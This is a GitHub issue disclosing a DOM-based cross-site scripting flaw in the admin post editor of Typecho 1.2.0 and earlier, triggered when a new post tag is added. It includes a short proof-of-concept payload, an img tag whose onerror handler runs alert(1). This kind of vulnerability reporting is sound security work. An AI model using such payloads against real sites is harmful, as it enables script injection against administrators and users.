Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Typecho <= 1.2.0
Typecho admin backend post editor with DOM-based XSS when adding a new post tag.
<li><p>aaa<a>test</a></p></li>
<li>
<li><p>aaa<img src=x onerror=alert(1)>aaa</p></li>
Reported by Srpopty, vulnerability discovered by using Corax.
The text was updated successfully, but these errors were encountered:
No branches or pull requests
Typecho <= 1.2.0 Post Editor with DOM-based-XSS Vulnerability
Influenced Version
Typecho <= 1.2.0
Description
Typecho admin backend post editor with DOM-based XSS when adding a new post tag.
<li><p>aaa<a>test</a></p></li>, it will be injected into a<li>html tag.POC
The text was updated successfully, but these errors were encountered: